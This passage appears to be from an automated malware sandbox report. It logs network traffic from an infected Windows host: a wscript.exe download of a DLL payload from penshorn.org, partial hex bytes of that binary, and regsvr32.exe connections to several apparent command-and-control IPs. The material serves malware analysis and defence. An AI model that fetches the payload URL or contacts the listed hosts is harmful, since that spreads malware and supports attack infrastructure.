                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.948777914 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.948831081 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.948873043 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.948873043 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.950839996 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.950891018 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.951215029 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.951231003 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:51.270438910 CET497048080192.168.2.791.121.146.47
                                                                                                                                                                                                                  Mar 17, 2023 09:20:51.297913074 CET80804970491.121.146.47192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:51.298029900 CET497048080192.168.2.791.121.146.47
                                                                                                                                                                                                                  Mar 17, 2023 09:20:51.303312063 CET497048080192.168.2.791.121.146.47
                                                                                                                                                                                                                  Mar 17, 2023 09:20:51.330867052 CET80804970491.121.146.47192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:51.350009918 CET80804970491.121.146.47192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:51.350043058 CET80804970491.121.146.47192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:51.350142956 CET497048080192.168.2.791.121.146.47
                                                                                                                                                                                                                  Mar 17, 2023 09:20:51.354528904 CET497048080192.168.2.791.121.146.47
                                                                                                                                                                                                                  Mar 17, 2023 09:20:51.382684946 CET80804970491.121.146.47192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:51.427123070 CET497048080192.168.2.791.121.146.47
                                                                                                                                                                                                                  Mar 17, 2023 09:20:52.890988111 CET497048080192.168.2.791.121.146.47
                                                                                                                                                                                                                  Mar 17, 2023 09:20:52.891063929 CET497048080192.168.2.791.121.146.47
                                                                                                                                                                                                                  Mar 17, 2023 09:20:52.918631077 CET80804970491.121.146.47192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:53.731551886 CET80804970491.121.146.47192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:53.786819935 CET497048080192.168.2.791.121.146.47
                                                                                                                                                                                                                  Mar 17, 2023 09:20:56.731915951 CET80804970491.121.146.47192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:56.731956005 CET80804970491.121.146.47192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:56.732100964 CET497048080192.168.2.791.121.146.47
                                                                                                                                                                                                                  Mar 17, 2023 09:20:56.732414007 CET497048080192.168.2.791.121.146.47
                                                                                                                                                                                                                  Mar 17, 2023 09:20:56.732490063 CET497048080192.168.2.791.121.146.47
                                                                                                                                                                                                                  Mar 17, 2023 09:20:56.759740114 CET80804970491.121.146.47192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:56.759777069 CET80804970491.121.146.47192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:57.543365955 CET497067080192.168.2.766.228.32.31
                                                                                                                                                                                                                  Mar 17, 2023 09:20:57.643359900 CET70804970666.228.32.31192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:57.643572092 CET497067080192.168.2.766.228.32.31
                                                                                                                                                                                                                  Mar 17, 2023 09:20:57.644154072 CET497067080192.168.2.766.228.32.31
                                                                                                                                                                                                                  Mar 17, 2023 09:20:57.743962049 CET70804970666.228.32.31192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:57.751302004 CET70804970666.228.32.31192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:57.751337051 CET70804970666.228.32.31192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:57.751492977 CET497067080192.168.2.766.228.32.31
                                                                                                                                                                                                                  Mar 17, 2023 09:20:57.759463072 CET497067080192.168.2.766.228.32.31
                                                                                                                                                                                                                  Mar 17, 2023 09:20:57.860630035 CET70804970666.228.32.31192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:57.861830950 CET497067080192.168.2.766.228.32.31
                                                                                                                                                                                                                  Mar 17, 2023 09:20:58.003084898 CET70804970666.228.32.31192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:58.834207058 CET70804970666.228.32.31192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:58.880858898 CET497067080192.168.2.766.228.32.31
                                                                                                                                                                                                                  Mar 17, 2023 09:21:01.835266113 CET70804970666.228.32.31192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:21:01.835304022 CET70804970666.228.32.31192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:21:01.835412025 CET497067080192.168.2.766.228.32.31
                                                                                                                                                                                                                  Mar 17, 2023 09:21:01.836841106 CET497067080192.168.2.766.228.32.31
                                                                                                                                                                                                                  Mar 17, 2023 09:21:01.836893082 CET497067080192.168.2.766.228.32.31
                                                                                                                                                                                                                  Mar 17, 2023 09:21:01.936738014 CET70804970666.228.32.31192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:21:01.936770916 CET70804970666.228.32.31192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:21:02.839169979 CET49707443192.168.2.7182.162.143.56
                                                                                                                                                                                                                  Mar 17, 2023 09:21:02.839224100 CET44349707182.162.143.56192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:21:02.839313030 CET49707443192.168.2.7182.162.143.56
                                                                                                                                                                                                                  Mar 17, 2023 09:21:02.839972973 CET49707443192.168.2.7182.162.143.56
                                                                                                                                                                                                                  Mar 17, 2023 09:21:02.839993954 CET44349707182.162.143.56192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:21:03.629724979 CET44349707182.162.143.56192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:21:03.629929066 CET49707443192.168.2.7182.162.143.56
                                                                                                                                                                                                                  Mar 17, 2023 09:21:03.633606911 CET49707443192.168.2.7182.162.143.56
                                                                                                                                                                                                                  Mar 17, 2023 09:21:03.633644104 CET44349707182.162.143.56192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:21:03.634202957 CET44349707182.162.143.56192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:21:03.638273954 CET49707443192.168.2.7182.162.143.56
                                                                                                                                                                                                                  Mar 17, 2023 09:21:03.638314962 CET44349707182.162.143.56192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:21:04.774854898 CET44349707182.162.143.56192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:21:04.774977922 CET44349707182.162.143.56192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:21:04.775068998 CET49707443192.168.2.7182.162.143.56
                                                                                                                                                                                                                  Mar 17, 2023 09:21:04.795176983 CET49707443192.168.2.7182.162.143.56
                                                                                                                                                                                                                  Mar 17, 2023 09:21:04.795214891 CET44349707182.162.143.56192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:21:04.795243979 CET49707443192.168.2.7182.162.143.56
                                                                                                                                                                                                                  Mar 17, 2023 09:21:04.795253038 CET44349707182.162.143.56192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:21:08.839267969 CET4970880192.168.2.7187.63.160.88
                                                                                                                                                                                                                  Mar 17, 2023 09:21:09.068533897 CET8049708187.63.160.88192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:21:09.068670034 CET4970880192.168.2.7187.63.160.88
                                                                                                                                                                                                                  Mar 17, 2023 09:21:09.070332050 CET4970880192.168.2.7187.63.160.88
                                                                                                                                                                                                                  Mar 17, 2023 09:21:09.298399925 CET8049708187.63.160.88192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:21:09.313729048 CET8049708187.63.160.88192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:21:09.313775063 CET8049708187.63.160.88192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:21:09.313870907 CET4970880192.168.2.7187.63.160.88
                                                                                                                                                                                                                  Mar 17, 2023 09:21:09.316318035 CET4970880192.168.2.7187.63.160.88
                                                                                                                                                                                                                  Mar 17, 2023 09:21:09.545104980 CET8049708187.63.160.88192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:21:09.546504021 CET4970880192.168.2.7187.63.160.88
                                                                                                                                                                                                                  Mar 17, 2023 09:21:09.814192057 CET8049708187.63.160.88192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:21:10.834235907 CET8049708187.63.160.88192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:21:10.881918907 CET4970880192.168.2.7187.63.160.88
                                                                                                                                                                                                                  Mar 17, 2023 09:21:13.835433006 CET8049708187.63.160.88192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:21:13.835474014 CET8049708187.63.160.88192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:21:13.835604906 CET4970880192.168.2.7187.63.160.88
                                                                                                                                                                                                                  Mar 17, 2023 09:21:13.839339018 CET4970880192.168.2.7187.63.160.88
                                                                                                                                                                                                                  Mar 17, 2023 09:21:13.839384079 CET4970880192.168.2.7187.63.160.88
                                                                                                                                                                                                                  Mar 17, 2023 09:21:14.067502975 CET8049708187.63.160.88192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:21:14.067533970 CET8049708187.63.160.88192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:21:14.589788914 CET497098080192.168.2.7167.172.199.165
                                                                                                                                                                                                                  Mar 17, 2023 09:21:16.762856960 CET808049709167.172.199.165192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:21:17.273138046 CET497098080192.168.2.7167.172.199.165
                                                                                                                                                                                                                  Mar 17, 2023 09:21:17.440056086 CET808049709167.172.199.165192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:21:17.944998026 CET497098080192.168.2.7167.172.199.165
                                                                                                                                                                                                                  Mar 17, 2023 09:21:18.111787081 CET808049709167.172.199.165192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:21:23.592509031 CET49710443192.168.2.7164.90.222.65
                                                                                                                                                                                                                  Mar 17, 2023 09:21:23.592566967 CET44349710164.90.222.65192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:21:23.592653036 CET49710443192.168.2.7164.90.222.65
                                                                                                                                                                                                                  Mar 17, 2023 09:21:23.602288008 CET49710443192.168.2.7164.90.222.65
                                                                                                                                                                                                                  Mar 17, 2023 09:21:23.602320910 CET44349710164.90.222.65192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:21:23.634953976 CET44349710164.90.222.65192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:21:23.636183023 CET49711443192.168.2.7164.90.222.65
                                                                                                                                                                                                                  Mar 17, 2023 09:21:23.636266947 CET44349711164.90.222.65192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:21:23.636372089 CET49711443192.168.2.7164.90.222.65
                                                                                                                                                                                                                  Mar 17, 2023 09:21:23.637645960 CET49711443192.168.2.7164.90.222.65
                                                                                                                                                                                                                  Mar 17, 2023 09:21:23.637679100 CET44349711164.90.222.65192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:21:23.669934988 CET44349711164.90.222.65192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:21:23.671323061 CET49712443192.168.2.7164.90.222.65
                                                                                                                                                                                                                  Mar 17, 2023 09:21:23.671365976 CET44349712164.90.222.65192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:21:23.671468019 CET49712443192.168.2.7164.90.222.65
                                                                                                                                                                                                                  Mar 17, 2023 09:21:23.673162937 CET49712443192.168.2.7164.90.222.65
                                                                                                                                                                                                                  Mar 17, 2023 09:21:23.673180103 CET44349712164.90.222.65192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:21:23.705636978 CET44349712164.90.222.65192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:21:23.706469059 CET49713443192.168.2.7164.90.222.65
                                                                                                                                                                                                                  Mar 17, 2023 09:21:23.706512928 CET44349713164.90.222.65192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:21:23.706579924 CET49713443192.168.2.7164.90.222.65
                                                                                                                                                                                                                  Mar 17, 2023 09:21:23.707212925 CET49713443192.168.2.7164.90.222.65
                                                                                                                                                                                                                  Mar 17, 2023 09:21:23.707228899 CET44349713164.90.222.65192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:21:23.739078999 CET44349713164.90.222.65192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:21:29.091363907 CET497148080192.168.2.7104.168.155.143
                                                                                                                                                                                                                  Mar 17, 2023 09:21:29.255897999 CET808049714104.168.155.143192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:21:29.758577108 CET497148080192.168.2.7104.168.155.143
                                                                                                                                                                                                                  Mar 17, 2023 09:21:29.923141956 CET808049714104.168.155.143192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:21:30.430452108 CET497148080192.168.2.7104.168.155.143
                                                                                                                                                                                                                  Mar 17, 2023 09:21:30.594842911 CET808049714104.168.155.143192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:21:36.093859911 CET497158080192.168.2.7163.44.196.120
                                                                                                                                                                                                                  Mar 17, 2023 09:21:36.304193020 CET808049715163.44.196.120192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:21:36.805974007 CET497158080192.168.2.7163.44.196.120
                                                                                                                                                                                                                  Mar 17, 2023 09:21:37.015871048 CET808049715163.44.196.120192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:21:37.524872065 CET497158080192.168.2.7163.44.196.120
                                                                                                                                                                                                                  Mar 17, 2023 09:21:37.734889984 CET808049715163.44.196.120192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:21:43.093698025 CET497168080192.168.2.7160.16.142.56
                                                                                                                                                                                                                  Mar 17, 2023 09:21:46.103615999 CET497168080192.168.2.7160.16.142.56
                                                                                                                                                                                                                  Mar 17, 2023 09:21:52.119745016 CET497168080192.168.2.7160.16.142.56
                                                                                                                                                                                                                  Mar 17, 2023 09:22:00.844053030 CET49717443192.168.2.7159.89.202.34
                                                                                                                                                                                                                  Mar 17, 2023 09:22:00.844151020 CET44349717159.89.202.34192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:22:00.844248056 CET49717443192.168.2.7159.89.202.34
                                                                                                                                                                                                                  Mar 17, 2023 09:22:00.844867945 CET49717443192.168.2.7159.89.202.34
                                                                                                                                                                                                                  Mar 17, 2023 09:22:00.844907999 CET44349717159.89.202.34192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:22:01.104784966 CET44349717159.89.202.34192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:22:01.106870890 CET49718443192.168.2.7159.89.202.34
                                                                                                                                                                                                                  Mar 17, 2023 09:22:01.106915951 CET44349718159.89.202.34192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:22:01.107023954 CET49718443192.168.2.7159.89.202.34
                                                                                                                                                                                                                  Mar 17, 2023 09:22:01.108690023 CET49718443192.168.2.7159.89.202.34
                                                                                                                                                                                                                  Mar 17, 2023 09:22:01.108711004 CET44349718159.89.202.34192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:22:01.366348982 CET44349718159.89.202.34192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:22:01.367492914 CET49719443192.168.2.7159.89.202.34
                                                                                                                                                                                                                  Mar 17, 2023 09:22:01.367535114 CET44349719159.89.202.34192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:22:01.367607117 CET49719443192.168.2.7159.89.202.34
                                                                                                                                                                                                                  Mar 17, 2023 09:22:01.368603945 CET49719443192.168.2.7159.89.202.34
                                                                                                                                                                                                                  Mar 17, 2023 09:22:01.368624926 CET44349719159.89.202.34192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:22:01.668397903 CET44349719159.89.202.34192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:22:01.669158936 CET49720443192.168.2.7159.89.202.34
                                                                                                                                                                                                                  Mar 17, 2023 09:22:01.669246912 CET44349720159.89.202.34192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:22:01.669344902 CET49720443192.168.2.7159.89.202.34
                                                                                                                                                                                                                  Mar 17, 2023 09:22:01.669830084 CET49720443192.168.2.7159.89.202.34
                                                                                                                                                                                                                  Mar 17, 2023 09:22:01.669862032 CET44349720159.89.202.34192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:22:01.954497099 CET44349720159.89.202.34192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:22:07.359441042 CET497218080192.168.2.7159.65.88.10
                                                                                                                                                                                                                  Mar 17, 2023 09:22:07.390343904 CET808049721159.65.88.10192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:22:07.891258955 CET497218080192.168.2.7159.65.88.10
                                                                                                                                                                                                                  Mar 17, 2023 09:22:07.922224998 CET808049721159.65.88.10192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:22:08.425611973 CET497218080192.168.2.7159.65.88.10
                                                                                                                                                                                                                  Mar 17, 2023 09:22:08.456589937 CET808049721159.65.88.10192.168.2.7

                                                                                                                                                                                                                  UDP Packets

                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                  Mar 17, 2023 09:20:07.523013115 CET5033053192.168.2.78.8.8.8
                                                                                                                                                                                                                  Mar 17, 2023 09:20:07.542522907 CET53503308.8.8.8192.168.2.7

                                                                                                                                                                                                                  DNS Queries

                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                  Mar 17, 2023 09:20:07.523013115 CET192.168.2.78.8.8.80x26b3Standard query (0)penshorn.orgA (IP address)IN (0x0001)false

                                                                                                                                                                                                                  DNS Answers

                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                  Mar 17, 2023 09:20:07.542522907 CET8.8.8.8192.168.2.70x26b3No error (0)penshorn.org203.26.41.131A (IP address)IN (0x0001)false

                                                                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                                                                  • penshorn.org
                                                                                                                                                                                                                  • 182.162.143.56

                                                                                                                                                                                                                  HTTP Packets

                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                  0192.168.2.749701203.26.41.131443C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                  1192.168.2.749707182.162.143.56443C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                  2192.168.2.749708187.63.160.8880C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                  Mar 17, 2023 09:21:09.070332050 CET784OUTData Raw: 16 03 03 00 97 01 00 00 93 03 03 64 14 93 74 1b 0a f3 41 9d 82 4f e7 cd 1c 43 16 26 10 16 fc f4 3c 4c 9e 30 4c 8e 1b 61 2b fc 0a 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                                                                                                                                                  Data Ascii: dtAOC&<L0La+*,+0/$#('=<5/@#
                                                                                                                                                                                                                  Mar 17, 2023 09:21:09.313729048 CET786INData Raw: 16 03 03 00 41 02 00 00 3d 03 03 c5 d7 ea 09 4b 2f b0 8a c3 91 b6 f3 a4 c3 56 dc bb 29 68 c6 2d c3 15 e2 10 a7 66 92 45 63 2f 6a 00 c0 30 00 00 15 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 23 00 00 00 17 00 00 16 03 03 03 cf 0b 00 03 cb 00 03 c8
                                                                                                                                                                                                                  Data Ascii: A=K/V)h-fEc/j0#00* aH0*H0w10UGB10ULondon10ULondon10UGlobal Security10UIT Department10Uexample.c
                                                                                                                                                                                                                  Mar 17, 2023 09:21:09.313775063 CET786INData Raw: 72 81 5b 56 a1 eb 83 76 a2 5c 26 4d 6b 19 35 67 38 b7 86 7f 99 cc 87 96 34 a0 a0 59 17 7b ca 89 69 f2 16 6a 58 b7 f9 ae 99 41 6e b0 32 c8 23 1e b1 15 5d e6 dc dd 99 a9 53 d9 5b 5c 23 14 de 03 23 4e f1 87 b6 16 03 03 00 04 0e 00 00 00
                                                                                                                                                                                                                  Data Ascii: r[Vv\&Mk5g84Y{ijXAn2#]S[\##N
                                                                                                                                                                                                                  Mar 17, 2023 09:21:09.316318035 CET786OUTData Raw: 16 03 03 00 25 10 00 00 21 20 0c 38 43 44 b5 85 8e 7a ce 56 37 24 a8 69 ab e8 b7 99 9c 07 8f a3 65 2a f0 20 26 94 a2 4c c5 5e 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 40 b7 7e 09 1c 8e 67 2a 42 c3 8e 06 d6 c0 71 a1 b8 ec 1c bb a4
                                                                                                                                                                                                                  Data Ascii: %! 8CDzV7$ie* &L^(@~g*BqLe
                                                                                                                                                                                                                  Mar 17, 2023 09:21:09.545104980 CET786INData Raw: 16 03 03 00 ba 04 00 00 b6 00 00 01 2c 00 b0 41 31 a7 4e 61 dc 74 8b 8a 90 c0 42 d1 49 f2 c2 af fd f2 f0 5d 75 80 f9 3d 30 d7 a4 33 75 be 3e d9 3d cd 0f 49 9d 8b d7 21 bc ca bf b1 10 12 06 ec 47 11 bb 36 72 bd b2 e8 32 28 4e c1 da 2b 25 61 25 fa
                                                                                                                                                                                                                  Data Ascii: ,A1NatBI]u=03u>=I!G6r2(N+%a%.Agl!y!K!sf?EDg'|@e;/G1J8<k%>Ts(AS57-fyH Pi=k$-vb0
                                                                                                                                                                                                                  Mar 17, 2023 09:21:09.546504021 CET787OUTData Raw: 17 03 03 00 7c 00 00 00 00 00 00 00 01 ed 9f 07 11 7e 18 7c e8 cf fa 0d 84 b1 28 5d ab f8 9c 2e 24 85 8b f0 29 3e d4 99 f1 a8 79 90 b0 ce b2 83 fa bc 47 8f 25 de b6 bc 35 5f fe b3 f1 40 d6 57 da be c0 90 11 15 6c e1 7a 28 7c de 52 b8 6c 1f b8 fc
                                                                                                                                                                                                                  Data Ascii: |~|(].$)>yG%5_@Wlz(|RlX~g<(9g4#Mb.6|$Md
                                                                                                                                                                                                                  Mar 17, 2023 09:21:10.834235907 CET787INData Raw: 17 03 03 01 3e d0 18 41 53 35 37 2d 67 b3 ab a6 30 4b 75 79 03 a9 5a e7 6a 02 f8 39 01 2e 53 3b 12 8f 6a 92 c2 79 dd 99 54 df ef 85 78 76 4b c5 8d 1d 88 b0 fe 26 34 ee 08 c5 80 4f 99 4d 71 a7 d9 5e 5c f5 0c ba 1c c6 be 88 99 2a ff 8d cc 2c 96 37
                                                                                                                                                                                                                  Data Ascii: >AS57-g0KuyZj9.S;jyTxvK&4OMq^\*,72,n{~WF_+#>Q~=!*aFzuP>NH/6-R3|EI;4&5.LRo!|Z;O/7/m6Y*%vlo!<v>
                                                                                                                                                                                                                  Mar 17, 2023 09:21:13.835433006 CET787INData Raw: 15 03 03 00 1a d0 18 41 53 35 37 2d 68 9e ff 20 32 2a 3d 28 1e 69 1a 1a 9f 75 01 7e ce 5f 15
                                                                                                                                                                                                                  Data Ascii: AS57-h 2*=(iu~_
                                                                                                                                                                                                                  Mar 17, 2023 09:21:13.839339018 CET787OUTData Raw: 15 03 03 00 1a 00 00 00 00 00 00 00 02 89 37 ff b3 d1 41 1f 7e d8 44 03 c2 19 ff 21 91 c5 a1
                                                                                                                                                                                                                  Data Ascii: 7A~D!


                                                                                                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                  0192.168.2.749701203.26.41.131443C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                  2023-03-17 08:20:08 UTC0OUTGET /admin/Ses8712iGR8du/ HTTP/1.1
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                                                                  Host: penshorn.org
                                                                                                                                                                                                                  2023-03-17 08:20:08 UTC0INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Date: Fri, 17 Mar 2023 08:20:08 GMT
                                                                                                                                                                                                                  Server: Apache
                                                                                                                                                                                                                  X-Powered-By: PHP/7.0.33
                                                                                                                                                                                                                  Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                  Expires: Fri, 17 Mar 2023 08:20:08 GMT
                                                                                                                                                                                                                  Content-Disposition: attachment; filename="B0q0jy0MtW4.dll"
                                                                                                                                                                                                                  Content-Transfer-Encoding: binary
                                                                                                                                                                                                                  Set-Cookie: 641422b893e98=1679041208; expires=Fri, 17-Mar-2023 08:21:08 GMT; Max-Age=60; path=/
                                                                                                                                                                                                                  Last-Modified: Fri, 17 Mar 2023 08:20:08 GMT
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Content-Type: application/x-msdownload
                                                                                                                                                                                                                  2023-03-17 08:20:08 UTC0INData Raw: 34 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4c 60 e2 3d 08 01 8c 6e 08 01 8c 6e 08 01 8c 6e 43 79 8f 6f 03 01 8c 6e 43 79 89 6f 8e 01 8c 6e 43 79 88 6f 04 01 8c 6e 88 7a 89 6f 28 01 8c 6e 88 7a 88 6f 06 01 8c 6e 88 7a 8f 6f 01 01 8c 6e 43 79 8d 6f 01 01 8c 6e 08 01 8d 6e 71 01 8c 6e 87 7a 85 6f 0c 01 8c 6e 87 7a 8c 6f 09 01 8c 6e 87 7a 73 6e 09 01 8c 6e 08 01 1b 6e 09 01 8c 6e 87 7a 8e 6f 09 01 8c 6e 52
                                                                                                                                                                                                                  Data Ascii: 4000MZ@!L!This program cannot be run in DOS mode.$L`=nnnCyonCyonCyonzo(nzonzonCyonnqnzonzonzsnnnnzonR
                                                                                                                                                                                                                  2023-03-17 08:20:09 UTC8INData Raw: f3 42 0f 7f 44 09 d0 f3 42 0f 7f 44 09 e0 f3 42 0f 7f 44 01 f0 f3 0f 7f 00 c3 48 83 ec 28 e8 ab 1a 00 00 84 c0 75 04 32 c0 eb 12 e8 fe 03 00 00 84 c0 75 07 e8 dd 1a 00 00 eb ec b0 01 48 83 c4 28 c3 48 83 ec 28 e8 23 03 00 00 48 85 c0 0f 95 c0 48 83 c4 28 c3 48 83 ec 28 33 c9 e8 a1 02 00 00 b0 01 48 83 c4 28 c3 cc cc 48 83 ec 28 84 c9 75 0a e8 ff 03 00 00 e8 9a 1a 00 00 b0 01 48 83 c4 28 c3 cc cc cc 48 83 ec 28 e8 e7 03 00 00 b0 01 48 83 c4 28 c3 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 57 41 54 41 55 41 56 41 57 48 83 ec 40 48 8b e9 4d 8b f9 49 8b c8 49 8b f0 4c 8b ea e8 d0 1a 00 00 4d 8b 67 08 4d 8b 37 49 8b 5f 38 4d 2b f4 f6 45 04 66 41 8b 7f 48 0f 85 dc 00 00 00 48 89 6c 24 30 48 89 74 24 38 3b 3b 0f 83 76 01 00 00 8b f7 48 03 f6 8b 44 f3 04 4c 3b
                                                                                                                                                                                                                  Data Ascii: BDBDBDH(u2uH(H(#HH(H(3H(H(uH(H(H(H\$Hl$Ht$WATAUAVAWH@HMIILMgM7I_8M+EfAHHl$0Ht$8;;vHDL;
                                                                                                                                                                                                                  2023-03-17 08:20:09 UTC16INData Raw: 0d 0a
                                                                                                                                                                                                                  Data Ascii:
